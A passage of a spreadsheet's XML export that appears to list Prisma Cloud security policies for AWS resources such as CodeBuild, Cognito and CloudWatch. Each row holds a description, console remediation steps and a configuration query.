2. In the console, select the specific region from region drop down on the top right corner, for which the alert is generated
3. Navigate to 'CloudWatch Dashboard' by selecting 'CloudWatch' under the 'Management &amp; Governance' in All services
4. In the navigation pane, choose 'Log groups' under the 'Logs' section
5. Select the log group that is reported and select 'Edit retention setting(s)' under the 'Actions' drop-down
6. In 'Retention setting', for 'Expire events after', choose a log retention value either 'Never expire' or the value more than 365 days according to your business requirements
7. Choose 'Save' 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-logging-policies/bc-aws-338
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-logging-policies/bc-aws-338</t>
        </is>
      </c>
      <c r="Y1596" t="inlineStr"/>
      <c r="Z1596" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name = 'aws-cloudwatch-log-group' AND json.rule = retentionInDays exists and retentionInDays less than 365
{"category":"Logging","resourceTypes":["aws_cloudwatch_log_group"]}</t>
        </is>
      </c>
      <c r="AA1596" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1596" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1596" t="inlineStr">
        <is>
          <t>PC-AWS-CWT-1235-CKV_AWS_338</t>
        </is>
      </c>
      <c r="AD1596" t="b">
        <v>1</v>
      </c>
      <c r="AE1596" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1596" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG15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96" t="inlineStr">
        <is>
          <t>5de329bf-6ea4-4bff-8e55-fb9e00adae7d</t>
        </is>
      </c>
      <c r="AI1596" t="inlineStr">
        <is>
          <t>c95b15e2-3bad-4c39-a04c-014fb6ef7890</t>
        </is>
      </c>
      <c r="AJ1596" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1596" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1597">
      <c r="A1597" t="inlineStr">
        <is>
          <t>CIS v1.2.0 (AWS)</t>
        </is>
      </c>
      <c r="B1597" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1597" s="2" t="inlineStr"/>
      <c r="D1597" t="inlineStr"/>
      <c r="E1597" t="inlineStr"/>
      <c r="F1597" t="inlineStr"/>
      <c r="G1597" t="b">
        <v>0</v>
      </c>
      <c r="H15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597" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1597" t="inlineStr">
        <is>
          <t>aws-code</t>
        </is>
      </c>
      <c r="K1597" t="inlineStr">
        <is>
          <t>Test policy for demo</t>
        </is>
      </c>
      <c r="L1597" t="inlineStr"/>
      <c r="M1597" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N1597" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O1597" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1597" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q1597" t="inlineStr">
        <is>
          <t>4</t>
        </is>
      </c>
      <c r="R1597" t="inlineStr">
        <is>
          <t>4.2</t>
        </is>
      </c>
      <c r="S1597" t="inlineStr"/>
      <c r="T1597" t="b">
        <v>0</v>
      </c>
      <c r="U1597" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1597" t="inlineStr">
        <is>
          <t>aws-code-build-project</t>
        </is>
      </c>
      <c r="W1597" t="inlineStr"/>
      <c r="X1597" t="inlineStr"/>
      <c r="Y1597" t="inlineStr"/>
      <c r="Z1597" t="inlineStr">
        <is>
          <t>config from cloud.resource where api.name = 'aws-code-build-project' AND json.rule = environment.privilegedMode exists and environment.privilegedMode is true</t>
        </is>
      </c>
      <c r="AA1597" t="inlineStr">
        <is>
          <t>Marius Banica</t>
        </is>
      </c>
      <c r="AB1597" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1597" t="inlineStr"/>
      <c r="AD1597" t="b">
        <v>0</v>
      </c>
      <c r="AE1597" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF1597" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG15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597" t="inlineStr">
        <is>
          <t>9b6573a1-67d7-4e20-b82b-c1e5838520aa</t>
        </is>
      </c>
      <c r="AI1597" t="inlineStr">
        <is>
          <t>a773b6a4-69d3-427e-98b6-0ca45290c829</t>
        </is>
      </c>
      <c r="AJ1597" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1597" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1598">
      <c r="A1598" t="inlineStr">
        <is>
          <t>MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, NYDFS 23 CRR-NY 500.0, Secure Controls Framework (SCF) - 2024.2, Microsoft Cloud Security Benchmark v1, TX-RAMP Level 1, CSA CCM v4.0.12, HITRUST CSF v.11.2.0, TX-RAMP Level 2, Secure Controls Framework (SCF) - 2024.2, NYDFS 23 CRR-NY 500.0, TX-RAMP Level 1, TX-RAMP Level 2, CSA CCM v4.0.12, ITSG-33, Microsoft Cloud Security Benchmark v1</t>
        </is>
      </c>
      <c r="B1598" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1598" s="2" t="inlineStr"/>
      <c r="D1598" t="inlineStr"/>
      <c r="E1598" t="inlineStr"/>
      <c r="F1598" t="inlineStr"/>
      <c r="G1598" t="b">
        <v>1</v>
      </c>
      <c r="H15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598" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1598" t="inlineStr">
        <is>
          <t>aws-code</t>
        </is>
      </c>
      <c r="K1598" t="inlineStr">
        <is>
          <t>AWS CodeBuild project environment variables contain plaintext AWS credentials</t>
        </is>
      </c>
      <c r="L1598" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M1598" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1598" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1598" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1598" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q1598" t="inlineStr">
        <is>
          <t>IM</t>
        </is>
      </c>
      <c r="R1598" t="inlineStr">
        <is>
          <t>IM-6</t>
        </is>
      </c>
      <c r="S1598" t="inlineStr"/>
      <c r="T1598" t="b">
        <v>0</v>
      </c>
      <c r="U1598" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1598" t="inlineStr">
        <is>
          <t>aws-code-build-project</t>
        </is>
      </c>
      <c r="W1598" t="inlineStr">
        <is>
          <t>This policy identifies the AWS CodeBuild project that contains the environment variables AWS_ACCESS_KEY_ID, AWS_SECRET_ACCESS_KEY  and Password in plaintext.
AWS CodeBuild environment variables configure build settings, pass contextual information, and manage sensitive data during the build process. Authentication credentials like AWS_ACCESS_KEY_ID and AWS_SECRET_ACCESS_KEY should never be stored in clear text, as this could lead to unintended data exposure and unauthorized access.
It is recommended that AWS CodeBuild environment variables be securely managed using AWS Secrets Manager or AWS Systems Manager Parameter Store to store sensitive data and remove plaintext credentials.</t>
        </is>
      </c>
      <c r="X1598" t="inlineStr">
        <is>
          <t>To remove environment variables from a AWS CodeBuild project,
1. Log in to the AWS Management Console.
2. In the console, select the specific region from the region drop-down in the top right corner, for which the alert is generated.
3. Navigate to 'Developer Tools' from the 'Services' dropdown and select the 'CodeBuild'.
4. In the navigation pane, choose 'Build projects'.
5. Select the reported Build project and choose Edit, then click 'Environment' and Expand 'Additional configuration'.
6. Choose 'Remove' next to the environment variables that contain plaintext credentials.
7. When you have finished changing your CodeBuild environment configuration, click ‘Update environment’.
You can store environment variables with sensitive values in the AWS Systems Manager Parameter Store or AWS Secrets Manager and then retrieve them from your build spec according to your business requirements.</t>
        </is>
      </c>
      <c r="Y1598" t="inlineStr"/>
      <c r="Z1598" t="inlineStr">
        <is>
          <t>config from cloud.resource where api.name = 'aws-code-build-project' AND json.rule = environment.environmentVariables[*].name exists and environment.environmentVariables[?any( (name contains "AWS_ACCESS_KEY_ID" or name contains "AWS_SECRET_ACCESS_KEY" or name contains "PASSWORD" ) and type equals "PLAINTEXT")] exists</t>
        </is>
      </c>
      <c r="AA1598" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1598" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1598" t="inlineStr">
        <is>
          <t>PC-AWS-BLD-1225</t>
        </is>
      </c>
      <c r="AD1598" t="b">
        <v>1</v>
      </c>
      <c r="AE1598" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1598" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG15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98" t="inlineStr">
        <is>
          <t>225c49ce-9e34-4dc6-a60a-c79b30a4ee15</t>
        </is>
      </c>
      <c r="AI1598" t="inlineStr">
        <is>
          <t>d66b8bbe-9139-4723-ab2a-a994d193b6eb</t>
        </is>
      </c>
      <c r="AJ1598" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1598" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1599">
      <c r="A1599" t="inlineStr"/>
      <c r="B1599" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1599" s="2" t="inlineStr"/>
      <c r="D1599" t="inlineStr"/>
      <c r="E1599" t="inlineStr"/>
      <c r="F1599" t="inlineStr"/>
      <c r="G1599" t="b">
        <v>1</v>
      </c>
      <c r="H15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599" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1599" t="inlineStr">
        <is>
          <t>aws-code</t>
        </is>
      </c>
      <c r="K1599" t="inlineStr">
        <is>
          <t>AWS CodeBuild project not configured with logging configuration</t>
        </is>
      </c>
      <c r="L1599" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M1599" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N1599" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1599" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1599" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q1599" t="inlineStr"/>
      <c r="R1599" t="inlineStr"/>
      <c r="S1599" t="inlineStr"/>
      <c r="T1599" t="b">
        <v>0</v>
      </c>
      <c r="U1599" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1599" t="inlineStr">
        <is>
          <t>aws-code-build-project</t>
        </is>
      </c>
      <c r="W1599" t="inlineStr">
        <is>
          <t>This policy identifies AWS CodeBuild project environments without a logging configuration.
AWS CodeBuild is a fully managed service for building, testing, and deploying code. Logging is a crucial security feature that allows for future forensic work in the event of a security incident. Correlating abnormalities in CodeBuild projects with threat detections helps boost confidence in their accuracy.
It is recommended to enable logging configuration on CodeBuild projects for monitoring and troubleshooting purposes.</t>
        </is>
      </c>
      <c r="X1599" t="inlineStr">
        <is>
          <t>1. Sign in to the AWS console. Navigate to the CodeBuild service
2. In the left navigation pane, select 'Build Projects' under 'Build'
3. Go to your AWS CodeBuild project
4. Select the 'Project details' tab, and under the 'Logs' section, select 'Edit'
5. Under the 'Edit Logs' page, based on the requirement, select either 'CloudWatch logs' or 'S3 logs'
6. For CloudWatch logging, provide a log group name
7. For S3 logging, provide the bucket name
8. Click on 'Update logs'. 
Build Recommendation: Refer the documentation for more details,
Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-logging-policies/bc-aws-314
IaC: Refer the documentation for more details,
Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-logging-policies/bc-aws-314</t>
        </is>
      </c>
      <c r="Y1599" t="inlineStr"/>
      <c r="Z1599" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name = 'aws-code-build-project' AND json.rule = not(logsConfig.cloudWatchLogs.status equal ignore case enabled or logsConfig.s3Logs.status equal ignore case enabled)
{"category":"Logging","resourceTypes":["aws_codebuild_project"]}</t>
        </is>
      </c>
      <c r="AA1599" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1599" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1599" t="inlineStr">
        <is>
          <t>PC-AWS-BLD-1229-CKV_AWS_314</t>
        </is>
      </c>
      <c r="AD1599" t="b">
        <v>1</v>
      </c>
      <c r="AE1599" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1599" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG15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599" t="inlineStr">
        <is>
          <t>8381a9e1-638a-442a-b6ad-423262c608c1</t>
        </is>
      </c>
      <c r="AI1599" t="inlineStr">
        <is>
          <t>5699ae73-275f-4d38-bd2f-512da77d4744</t>
        </is>
      </c>
      <c r="AJ1599" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1599" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1600">
      <c r="A1600" t="inlineStr">
        <is>
          <t>Australian Cyber Security Centre (ACSC) Essential Eight - Level 2, NIST SP 800-171 Revision 3, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), CRI Profile v2.0, Microsoft Cloud Security Benchmark v1, HITRUST CSF v.11.2.0, Australian Cyber Security Centre (ACSC) Essential Eight - Level 3, Australian Cyber Security Centre (ACSC) Essential Eight - Level 1, Insurance Regulatory And Development Authority Of India, TX-RAMP Level 1, NIST CSF v2.0, ITSG-33, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), CRI Profile v2.0, NIST CSF v2.0, NYDFS 23 CRR-NY 500.0, NIST 800-53 Rev 5, MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs), Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs)</t>
        </is>
      </c>
      <c r="B1600" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1600" s="2" t="inlineStr"/>
      <c r="D1600" t="inlineStr"/>
      <c r="E1600" t="inlineStr"/>
      <c r="F1600" t="inlineStr"/>
      <c r="G1600" t="b">
        <v>1</v>
      </c>
      <c r="H16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0" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1600" t="inlineStr">
        <is>
          <t>aws-code</t>
        </is>
      </c>
      <c r="K1600" t="inlineStr">
        <is>
          <t>AWS CodeBuild project environment privileged mode is enabled</t>
        </is>
      </c>
      <c r="L1600" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M1600" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N1600" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1600" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1600" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q1600" t="inlineStr">
        <is>
          <t>Principle 6</t>
        </is>
      </c>
      <c r="R1600" t="inlineStr">
        <is>
          <t>6.2</t>
        </is>
      </c>
      <c r="S1600" t="inlineStr"/>
      <c r="T1600" t="b">
        <v>0</v>
      </c>
      <c r="U1600" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1600" t="inlineStr">
        <is>
          <t>aws-code-build-project</t>
        </is>
      </c>
      <c r="W1600" t="inlineStr">
        <is>
          <t>This policy identifies the CodeBuild projects where the privileged mode is enabled. Privileged mode grants unrestricted access to all devices and runs the Docker daemon inside the container. It is recommended to enable this mode only for building Docker images. It recommended disabling the privileged mode to prevent unintended access to Docker APIs and container hardware, reducing the risk of potential tampering or critical resource deletion.</t>
        </is>
      </c>
      <c r="X1600" t="inlineStr">
        <is>
          <t>To disable the Privileged mode for the CodeBuild project:
1. Log in to the AWS Management Console.
2. In the console, select the specific region from the region drop-down in the top right corner, for which the alert is generated.
3. Navigate to 'Developer Tools' from the 'Services' dropdown and select the 'CodeBuild'.
4. In the navigation pane, choose 'Build projects'.
5. Select the reported Build project and choose Edit, then click ‘Environment'.
6. On the Edit Environment page, expand the configuration by clicking the 'Override image' button.
7. Uncheck the checkbox 'Enable this flag if you want to build Docker images or want your builds to get elevated privileges.' under the 'Privileged' section.
8. When you have finished changing your CodeBuild environment configuration, click ‘Update environment’. 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/bc-aws-316
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/bc-aws-316</t>
        </is>
      </c>
      <c r="Y1600" t="inlineStr"/>
      <c r="Z1600" t="inlineStr">
        <is>
          <t>config from cloud.resource where api.name = 'aws-code-build-project' AND json.rule = environment.privilegedMode exists and environment.privilegedMode is true
{"category":"General","resourceTypes":["aws_codebuild_project"]}</t>
        </is>
      </c>
      <c r="AA1600" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1600" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1600" t="inlineStr">
        <is>
          <t>PC-AWS-BLD-1057-CKV_AWS_316</t>
        </is>
      </c>
      <c r="AD1600" t="b">
        <v>1</v>
      </c>
      <c r="AE1600" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1600" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG16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0" t="inlineStr">
        <is>
          <t>c2858dc3-d887-436a-80eb-32e2bfd7d0f2</t>
        </is>
      </c>
      <c r="AI1600" t="inlineStr">
        <is>
          <t>a773b6a4-69d3-427e-98b6-0ca45290c829</t>
        </is>
      </c>
      <c r="AJ1600" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1600" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1601">
      <c r="A1601" t="inlineStr">
        <is>
          <t>CIS Controls v8.1, ITSG-33, TX-RAMP Level 2, Insurance Regulatory And Development Authority Of India, Secure Controls Framework (SCF) - 2024.2, SOC 2, NYDFS 23 CRR-NY 500.0, CIS Controls v8.1, ISO/IEC 27001:2022</t>
        </is>
      </c>
      <c r="B1601" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1601" s="2" t="inlineStr"/>
      <c r="D1601" t="inlineStr"/>
      <c r="E1601" t="inlineStr"/>
      <c r="F1601" t="inlineStr"/>
      <c r="G1601" t="b">
        <v>1</v>
      </c>
      <c r="H16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1" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1601" t="inlineStr">
        <is>
          <t>aws-cognito</t>
        </is>
      </c>
      <c r="K1601" t="inlineStr">
        <is>
          <t>AWS Cognito identity pool allows unauthenticated guest access</t>
        </is>
      </c>
      <c r="L1601" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M1601" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N1601" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1601" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1601" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q1601" t="inlineStr">
        <is>
          <t>Technological Controls</t>
        </is>
      </c>
      <c r="R1601" t="inlineStr">
        <is>
          <t>A8.12</t>
        </is>
      </c>
      <c r="S1601" t="inlineStr"/>
      <c r="T1601" t="b">
        <v>0</v>
      </c>
      <c r="U1601" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1601" t="inlineStr">
        <is>
          <t>aws-cognito-identity-pool</t>
        </is>
      </c>
      <c r="W1601" t="inlineStr">
        <is>
          <t>This policy identifies AWS Cognito identity pools that allow unauthenticated guest access.
AWS Cognito identity pools unauthenticated guest access and allows unauthenticated users to assume a role in your AWS account. These unauthenticated users will be granted permissions of the assumed role which may have more privileges than that are intended. This could lead to unauthorized access or data leakage.
It is recommended to disable unauthenticated guest access for the Cognito identity pools.</t>
        </is>
      </c>
      <c r="X1601" t="inlineStr">
        <is>
          <t>To deactivate guest access in an identity pool,
1. Log in to AWS console
2. Navigate to the reported resource region by selecting the region from the dropdown in the top right corner.
3. Navigate to the Amazon Cognito dashboard
4. Under 'Identity pools' section, select the reported identity pool
5. In 'User access' tab, under 'Guest access' section
6. Click on 'Deactivate' button to deactivate the guest access configured.
NOTE: Before you deactivate unauthenticated guest access, it is must to have at-least one authenticated access configured in your identity pool.</t>
        </is>
      </c>
      <c r="Y1601" t="inlineStr"/>
      <c r="Z1601" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name = 'aws-cognito-identity-pool' AND json.rule = allowUnauthenticatedIdentities is true</t>
        </is>
      </c>
      <c r="AA1601" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1601" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1601" t="inlineStr">
        <is>
          <t>PC-AWS-COG-1140</t>
        </is>
      </c>
      <c r="AD1601" t="b">
        <v>1</v>
      </c>
      <c r="AE1601" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1601" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG16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1" t="inlineStr">
        <is>
          <t>3626a6d9-d55e-48b2-ae4c-2453ab65ff88</t>
        </is>
      </c>
      <c r="AI1601" t="inlineStr">
        <is>
          <t>58b0f618-1fcf-415c-a72e-b92154e0602d</t>
        </is>
      </c>
      <c r="AJ1601" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1601" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1602">
      <c r="A1602" t="inlineStr"/>
      <c r="B1602" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1602" s="2" t="inlineStr"/>
      <c r="D1602" t="inlineStr"/>
      <c r="E1602" t="inlineStr"/>
      <c r="F1602" t="inlineStr"/>
      <c r="G1602" t="b">
        <v>0</v>
      </c>
      <c r="H16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2" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1602" t="inlineStr">
        <is>
          <t>aws-configservice</t>
        </is>
      </c>
      <c r="K1602" t="inlineStr">
        <is>
          <t>test-rule-vwg</t>
        </is>
      </c>
      <c r="L1602" t="inlineStr"/>
      <c r="M1602" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1602" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O1602" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1602" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q1602" t="inlineStr"/>
      <c r="R1602" t="inlineStr"/>
      <c r="S1602" t="inlineStr"/>
      <c r="T1602" t="b">
        <v>0</v>
      </c>
      <c r="U1602" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1602" t="inlineStr">
        <is>
          <t>aws-configservice-describe-configuration-recorders</t>
        </is>
      </c>
      <c r="W1602" t="inlineStr"/>
      <c r="X1602" t="inlineStr"/>
      <c r="Y1602" t="inlineStr"/>
      <c r="Z1602" t="inlineStr">
        <is>
          <t>config from cloud.resource where api.name = 'aws-configservice-describe-configuration-recorders' AND json.rule = 'region equals "eu-west-1" and recordingGroup.allSupported is true and recordingGroup.includeGlobalResourceTypes is true or region is member of ("eu-central-1", "us-east-1", "ap-south-1", "ap-northeast-2", "sa-east-1" ) and recordingGroup.allSupported is true' as X; count(X) less than 1</t>
        </is>
      </c>
      <c r="AA1602" t="inlineStr">
        <is>
          <t>Brandon Goldstein</t>
        </is>
      </c>
      <c r="AB1602" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1602" t="inlineStr"/>
      <c r="AD1602" t="b">
        <v>0</v>
      </c>
      <c r="AE1602" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF1602" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG16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2" t="inlineStr">
        <is>
          <t>d0d4af8d-61e9-46e5-8abf-bf642cf5b877</t>
        </is>
      </c>
      <c r="AI1602" t="inlineStr">
        <is>
          <t>730d6d40-383f-469f-8d4f-2c8ba8ccb3ba</t>
        </is>
      </c>
      <c r="AJ1602" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1602" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1603">
      <c r="A1603" t="inlineStr">
        <is>
          <t>ISO/IEC 27002:2013, RBI Baseline Cyber Security and Resilience Requirements, CRI Profile v2.0, Brazilian Data Protection Law (LGPD), Sarbanes Oxley Act (SOX), Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), Secure Controls Framework (SCF) - 2024.2, APRA (CPS 234) Information Security, MLPS 2.0 (Level 2), PCI DSS v4.0, NIST CSF v2.0, ISO/IEC 27017:2015, MLPS 2.0 (Level 2), Telecommunications Security Act - TSA, ISO 27002:2022, Risk Management in Technology (RMiT), ISO/IEC 27002:2013, ITSG-33, Secure Controls Framework (SCF) - 2024.2, PCI DSS v4.0, PCI DSS v4.0, MITRE ATT&amp;CK v12, CSA CCM v.4.0.1, ACSC Information Security Manual (ISM), APRA (CPS 234) Information Security, ISO/IEC 27017:2015, PCI DSS v3.2.1, CIS Controls v8, CSA CCM v.4.0.1, GDPR, ISO/IEC 27017:2015, kfirdaus AWS Account-CS, CIS Controls v7.1, ISO/IEC 27001:2022, CyberSecurity Law of the People's Republic of China, Microsoft Cloud Security Benchmark v1, ISO/IEC 27001:2022, ACSC Information Security Manual (ISM), Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), MAS TRM 2021, PCI DSS v4.0, HITRUST CSF v.9.6.0, Secure Controls Framework (SCF) - 2022.2.1, HITRUST v.9.4.2 [Deprecated], ISO 27002:2022, CSA CCM v.4.0.6, TX-RAMP Level 1, NIST SP 800-171 Revision 2, Secure Controls Framework (SCF) - 2022.2.1, NIST SP 800-172, Copy of CIS Controls v8, PCI DSS v4.0, TX-RAMP Level 2, Secure Controls Framework (SCF) - 2024.2, CSA CCM v4.0.12, NIST CSF v2.0, Copy of ACSC Information Security Manual (ISM)-clone, HITRUST v.9.4.2 [Deprecated], CHC HITRUST CSF v.9.6.0, CSA CCM v4.0.12, RBI Baseline Cyber Security and Resilience Requirements, HITRUST CSF v.11.2.0, Copy of CIS Controls v8, CyberSecurity Law of the People's Republic of China, Brazilian Data Protection Law (LGPD), CSA CCM v.4.0.1, PCI DSS v4.0, PCI DSS v4.0, CIS Controls v8, FFIEC, CSA CCM v.4.0.1, CIS Controls v8.1, CRI Profile v2.0, Secure Controls Framework (SCF) - 2022.2.1, PCI DSS v4.0, Risk Management in Technology (RMiT), MLPS 2.0, CHC HITRUST CSF v.9.6.0, Insurance Regulatory And Development Authority Of India, MITRE ATT&amp;CK v14.0 Cloud IaaS for Enterprise, CRI Profile v1.2.1, HITRUST CSF v.11.2.0, ISO 27002:2022, kashan ACSC Information Security Manual (ISM), APRA (CPS 234) Information Security, CIS Controls v7.1, ISO/IEC 27002:2013, Secure Controls Framework (SCF) - 2022.2.1, PCI DSS v4.0, SOC 2, HIPAA, kfirdaus AWS Account-CS, PIPEDA, MLPS 2.0 (Level 3), NIST CSF, kashan ACSC Information Security Manual (ISM), PCI DSS v4.0, PCI DSS v4.0, CRI Profile v1.2.1, CSA CCM v.4.0.6, CRI Profile v2.0, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), ISO/IEC 27002:2013, FFIEC, MITRE ATT&amp;CK v13.0 Cloud IaaS for Enterprise, CCPA 2018, MITRE ATT&amp;CK v10.0 [Deprecated], MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, CSA CCM v.4.0.6, CIS Controls v8.1, CSA CCM v4.0.12, DORA, CSA CCM v.4.0.6, HITRUST CSF v.9.6.0, Matt's ATT&amp;ACK, ISO/IEC 27001:2022, DORA, Copy of ACSC Information Security Manual (ISM)-clone, PCI DSS v3.2.1, HITRUST CSF v.9.6.0, PCI DSS v4.0, 